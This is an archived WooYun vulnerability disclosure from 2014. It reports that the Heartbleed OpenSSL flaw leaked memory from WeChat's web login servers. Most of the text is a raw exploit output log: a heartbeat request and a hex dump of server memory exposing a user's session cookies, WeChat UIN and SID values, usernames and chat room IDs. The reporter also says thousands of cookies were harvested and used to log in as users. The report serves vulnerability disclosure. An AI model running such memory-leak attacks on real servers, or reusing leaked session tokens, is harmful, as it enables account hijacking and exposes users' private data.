乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-04-08: 细节已通知厂商并且等待厂商处理中 2014-04-13: 厂商已经主动忽略漏洞,细节向公众公开
微信网页版和公众账号版运维不当导致可随机登录微信用户并获取服务器敏感信息http://wx.qq.comhttp://mp.weixin.qq.com
#1 漏洞描述 (CVE-2014-0160)http://drops.wooyun.org/papers/1381针对Openssl heartbeat漏洞的exp已经流出,经过测试可以dump出任何使用openssl库进程的内存数据,每次64kb,位置随机,但是由于exp起来十分容易速度很快并且可以多线程,一会就获得了几千个用户的cookie,随机抽取了几个发现可以任意登录。#2 危害描述该漏洞不但能获取cookie、源码、服务器配置,研究者声称他们能成功恢复SSL密钥
# 获取cookie
Connecting...Sending Client Hello...Waiting for Server Hello... ... received message: type = 22, ver = 0302, length = 58 ... received message: type = 22, ver = 0302, length = 3554 ... received message: type = 22, ver = 0302, length = 525 ... received message: type = 22, ver = 0302, length = 4Sending heartbeat request... ... received message: type = 24, ver = 0302, length = 16384Received heartbeat response: 0000: 02 40 00 D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C [email protected][...r... 0010: BC 2B 92 A8 48 97 CF BD 39 04 CC 16 0A 85 03 90 .+..H...9....... 0020: 9F 77 04 33 D4 DE 00 00 66 C0 14 C0 0A C0 22 C0 .w.3....f.....". 0030: 21 00 39 00 38 00 88 00 87 C0 0F C0 05 00 35 00 !.9.8.........5. 0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0 ................ 0050: 03 00 0A C0 13 C0 09 C0 1F C0 1E 00 33 00 32 00 ............3.2. 0060: 9A 00 99 00 45 00 44 C0 0E C0 04 00 2F 00 96 00 ....E.D...../... 0070: 41 C0 11 C0 07 C0 0C C0 02 00 05 00 04 00 15 00 A............... 0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01 ................ 0090: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00 ..I...........4. 00a0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00 2............... 00b0: 0A 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00 ................ 00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00 ................ 00d0: 10 00 11 00 23 00 00 00 0F 00 01 01 65 35 32 31 ....#.......e521 00e0: 39 32 32 32 36 34 36 37 33 33 34 34 26 73 79 6E 922264673344&syn 00f0: 63 6B 65 79 3D 31 5F 36 32 34 33 35 30 35 35 32 ckey=1_624350552 0100: 25 37 43 32 5F 36 32 34 33 35 31 31 31 34 25 37 %7C2_624351114%7 0110: 43 33 5F 36 32 34 33 35 31 30 39 32 25 37 43 31 C3_624351092%7C1 0120: 31 5F 36 32 34 33 35 30 30 32 30 25 37 43 32 30 1_624350020%7C20 0130: 31 5F 31 33 39 36 39 34 33 36 32 32 25 37 43 31 1_1396943622%7C1 0140: 30 30 30 5F 31 33 39 36 39 32 30 35 32 30 26 5F 000_1396920520&_ 0150: 3D 31 33 39 36 39 34 34 34 32 37 39 35 34 20 48 =1396944427954 H 0160: 54 54 50 2F 31 2E 31 0D 0A 48 6F 73 74 3A 20 77 TTP/1.1..Host: w 0170: 65 62 70 75 73 68 2E 77 65 69 78 69 6E 2E 71 71 ebpush.weixin.qq 0180: 2E 63 6F 6D 0D 0A 43 6F 6E 6E 65 63 74 69 6F 6E .com..Connection 0190: 3A 20 6B 65 65 70 2D 61 6C 69 76 65 0D 0A 41 63 : keep-alive..Ac 01a0: 63 65 70 74 3A 20 2A 2F 2A 0D 0A 55 73 65 72 2D cept: */*..User- 01b0: 41 67 65 6E 74 3A 20 4D 6F 7A 69 6C 6C 61 2F 35 Agent: Mozilla/5 01c0: 2E 30 20 28 57 69 6E 64 6F 77 73 20 4E 54 20 35 .0 (Windows NT 5 01d0: 2E 31 29 20 41 70 70 6C 65 57 65 62 4B 69 74 2F .1) AppleWebKit/ 01e0: 35 33 37 2E 33 36 20 28 4B 48 54 4D 4C 2C 20 6C 537.36 (KHTML, l 01f0: 69 6B 65 20 47 65 63 6B 6F 29 20 43 68 72 6F 6D ike Gecko) Chrom 0200: 65 2F 32 38 2E 30 2E 31 35 30 30 2E 39 35 20 53 e/28.0.1500.95 S 0210: 61 66 61 72 69 2F 35 33 37 2E 33 36 20 53 45 20 afari/537.36 SE 0220: 32 2E 58 20 4D 65 74 61 53 72 20 31 2E 30 0D 0A 2.X MetaSr 1.0.. 0230: 52 65 66 65 72 65 72 3A 20 68 74 74 70 73 3A 2F Referer: https:/ 0240: 2F 77 78 2E 71 71 2E 63 6F 6D 2F 3F 26 6C 61 6E /wx.qq.com/?&lan 0250: 67 3D 7A 68 5F 43 4E 0D 0A 41 63 63 65 70 74 2D g=zh_CN..Accept- 0260: 45 6E 63 6F 64 69 6E 67 3A 20 67 7A 69 70 2C 64 Encoding: gzip,d 0270: 65 66 6C 61 74 65 2C 73 64 63 68 0D 0A 41 63 63 eflate,sdch..Acc 0280: 65 70 74 2D 4C 61 6E 67 75 61 67 65 3A 20 7A 68 ept-Language: zh 0290: 2D 43 4E 2C 7A 68 3B 71 3D 30 2E 38 0D 0A 43 6F -CN,zh;q=0.8..Co 02a0: 6F 6B 69 65 3A 20 61 64 69 64 3D 39 31 30 39 31 okie: adid=91091 02b0: 31 38 35 31 3B 20 61 64 56 65 72 3D 32 38 38 31 1851; adVer=2881 02c0: 3B 20 61 63 3D 31 2C 30 32 30 2C 3B 20 70 67 76 ; ac=1,020,; pgv 02d0: 5F 72 5F 63 6F 6F 6B 69 65 3D 31 30 36 31 38 31 _r_cookie=106181 02e0: 35 36 32 39 39 37 38 3B 20 70 76 69 64 3D 39 37 5629978; pvid=97 02f0: 36 37 36 33 32 36 36 32 3B 20 41 52 45 41 43 4F 67632662; AREACO 0300: 44 45 3D 31 7C 31 32 7C 3B 20 50 43 43 4F 4F 4B DE=1|12|; PCCOOK 0310: 49 45 3D 35 63 35 30 35 36 31 39 30 36 30 35 33 IE=5c50561906053 0320: 64 65 35 36 38 61 37 35 66 37 61 33 61 37 61 62 de568a75f7a3a7ab 0330: 36 63 38 34 34 36 32 62 65 36 35 39 61 38 65 61 6c84462be659a8ea 0340: 64 64 34 31 30 33 62 64 61 36 62 61 36 35 35 61 dd4103bda6ba655a 0350: 36 39 35 3B 20 50 43 43 4F 4F 4B 49 45 32 3D 33 695; PCCOOKIE2=3 0360: 38 32 31 32 33 30 34 37 3B 20 6C 76 5F 69 72 74 82123047; lv_irt 0370: 5F 69 64 3D 37 35 63 65 63 30 33 39 38 35 36 35 _id=75cec0398565 0380: 65 30 37 34 36 38 63 30 31 35 66 39 31 39 38 65 e07468c015f9198e 0390: 33 61 37 36 3B 20 6F 5F 63 6F 6F 6B 69 65 3D 39 3a76; o_cookie=9 03a0: 31 30 39 31 31 38 35 31 3B 20 67 5F 70 76 69 64 10911851; g_pvid 03b0: 3D 31 33 39 35 35 33 32 36 39 37 30 30 30 3B 20 =1395532697000; 03c0: 71 6D 5F 75 73 65 72 6E 61 6D 65 3D 39 31 30 39 qm_username=9109 03d0: 31 31 38 35 31 3B 20 71 6D 5F 73 69 64 3D 63 37 11851; qm_sid=c7 03e0: 63 66 62 61 66 62 66 62 32 37 63 31 65 33 32 63 cfbafbfb27c1e32c 03f0: 38 34 32 37 36 31 33 32 30 39 30 39 61 39 2C 71 842761320909a9,q 0400: 53 30 64 4D 53 57 31 73 59 6A 52 58 62 69 70 4E S0dMSW1sYjRXbipN 0410: 5A 6D 68 68 4F 57 4E 7A 4D 57 74 36 59 6E 64 35 ZmhhOWNzMWt6Ynd5 0420: 65 58 4E 69 52 58 46 76 59 54 5A 73 57 47 6C 30 eXNiRXFvYTZsWGl0 0430: 62 6B 74 51 52 6E 52 6E 62 31 38 2E 3B 20 52 4B bktQRnRnb18.; RK 0440: 3D 52 37 30 6D 35 69 49 56 64 75 3B 20 70 74 69 =R70m5iIVdu; pti 0450: 73 70 3D 63 74 63 3B 20 70 74 63 7A 3D 65 35 33 sp=ctc; ptcz=e53 0460: 32 35 33 39 65 34 34 63 35 34 66 63 35 65 38 34 2539e44c54fc5e84 0470: 63 38 34 36 65 31 64 38 63 65 64 31 32 62 61 61 c846e1d8ced12baa 0480: 34 37 30 62 32 65 63 39 64 61 66 64 65 31 62 31 470b2ec9dafde1b1 0490: 65 63 35 63 32 31 64 33 39 62 64 38 37 3B 20 70 ec5c21d39bd87; p 04a0: 74 32 67 67 75 69 6E 3D 6F 30 39 31 30 39 31 31 t2gguin=o0910911 04b0: 38 35 31 3B 20 70 67 76 5F 69 6E 66 6F 3D 73 73 851; pgv_info=ss 04c0: 69 64 3D 73 32 30 32 39 36 35 30 35 35 33 3B 20 id=s2029650553; 04d0: 74 73 5F 72 65 66 65 72 3D 77 77 77 2E 73 6F 67 ts_refer=www.sog 04e0: 6F 75 2E 63 6F 6D 2F 73 6F 67 6F 75 3B 20 70 67 ou.com/sogou; pg 04f0: 76 5F 70 76 69 64 3D 35 38 38 31 37 32 35 32 36 v_pvid=588172526 0500: 3B 20 74 73 5F 75 69 64 3D 31 35 35 38 31 33 31 ; ts_uid=1558131 0510: 36 30 3B 20 75 69 6E 3D 3B 20 73 6B 65 79 3D 3B 60; uin=; skey=; 0520: 20 72 76 32 3D 38 30 39 41 35 33 34 41 45 41 37 rv2=809A534AEA7 0530: 45 38 43 33 30 33 37 38 32 37 39 45 30 35 37 34 E8C30378279E0574 0540: 30 45 44 39 38 41 39 30 44 43 39 33 42 45 44 44 0ED98A90DC93BEDD 0550: 38 39 42 38 41 44 35 3B 20 70 72 6F 70 65 72 74 89B8AD5; propert 0560: 79 32 30 3D 38 37 44 34 38 44 33 41 46 36 34 36 y20=87D48D3AF646 0570: 41 35 38 30 41 41 37 30 33 35 44 36 31 34 42 43 A580AA7035D614BC 0580: 43 46 39 39 37 41 42 44 39 30 44 45 38 33 36 44 CF997ABD90DE836D 0590: 35 30 44 36 41 46 46 43 31 33 32 32 39 38 34 46 50D6AFFC1322984F 05a0: 31 34 30 30 35 33 42 39 31 38 44 35 45 42 33 41 140053B918D5EB3A 05b0: 42 46 31 32 3B 20 77 65 62 77 78 75 76 69 64 3D BF12; webwxuvid= 05c0: 33 32 37 35 31 39 37 38 34 30 3B 20 6D 6D 5F 6C 3275197840; mm_l 05d0: 61 6E 67 3D 7A 68 5F 43 4E 3B 20 77 78 73 74 61 ang=zh_CN; wxsta 05e0: 79 74 69 6D 65 3D 31 33 39 36 39 34 33 35 31 37 ytime=1396943517 05f0: 3B 20 77 78 70 6C 75 67 69 6E 6B 65 79 3D 31 33 ; wxpluginkey=13 0600: 39 36 39 32 30 35 32 30 3B 20 77 78 75 69 6E 3D 96920520; wxuin= 0610: 31 34 30 39 37 31 38 31 38 31 3B 20 77 78 73 69 1409718181; wxsi 0620: 64 3D 54 31 75 4F 46 70 6B 2F 54 52 58 36 5A 34 d=T1uOFpk/TRX6Z4 0630: 76 75 0D 0A 0D 0A 67 7D C6 C8 EF A2 0C A3 32 C9 vu....g}......2. 0640: CD AB 8A 95 57 71 01 2D E3 A7 05 05 05 05 05 05 ....Wq.-........ 0650: 2D 79 6F 22 2C 22 43 68 61 74 52 6F 6F 6D 49 64 -yo","ChatRoomId 0660: 22 3A 33 33 31 39 31 30 32 38 33 37 7D 2C 7B 22 ":3319102837},{" 0670: 55 73 65 72 4E 61 6D 65 22 3A 22 77 78 69 64 5F UserName":"wxid_ 0680: 64 6A 6F 61 33 78 31 30 32 30 72 38 32 32 22 2C djoa3x1020r822", 0690: 22 43 68 61 74 52 6F 6F 6D 49 64 22 3A 33 33 31 "ChatRoomId":331 06a0: 39 31 30 32 38 33 37 7D 2C 7B 22 55 73 65 72 4E 9102837},{"UserN 06b0: 61 6D 65 22 3A 22 77 78 69 64 5F 6D 36 68 35 67 ame":"wxid_m6h5g 06c0: 6F 6E 39 66 79 38 34 32 31 22 2C 22 43 68 61 74 on9fy8421","Chat 06d0: 52 6F 6F 6D 49 64 22 3A 33 33 31 39 31 30 32 38 RoomId":33191028 06e0: 33 37 7D 2C 7B 22 55 73 65 72 4E 61 6D 65 22 3A 37},{"UserName": 06f0: 22 73 68 69 74 6F 75 35 30 37 30 38 32 22 2C 22 "shitou507082"," 0700: 43 68 61 74 52 6F 6F 6D 49 64 22 3A 33 33 31 39 ChatRoomId":3319 0710: 31 30 32 38 33 37 7D 2C 7B 22 55 73 65 72 4E 61 102837},{"UserNa 0720: 6D 65 22 3A 22 72 75 6E 71 69 31 31 22 2C 22 43 me":"runqi11","C 0730: 68 61 74 52 6F 6F 6D 49 64 22 3A 33 33 31 39 31 hatRoomId":33191 0740: 30 32 38 33 37 7D 5D 7D 75 5E 87 30 86 EF B4 88 02837}]}u^.0.... 0750: C4 13 B3 66 1A F7 22 56 70 A2 4D 35 03 03 03 03 ...f.."Vp.M5.... 0760: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0770: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0780: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
# 更新openssl到最新版或降级
危害等级:无影响厂商忽略
忽略时间:2014-04-13 16:10
漏洞Rank:8 (WooYun评价)
2014-04-14:感谢您的反馈,该问题属于通用型漏洞,已有白帽子通过其它途径先于您报告,并已知会相关业务修复。再次感谢您的支持,如有疑问,欢迎反馈,我们将有专人跟进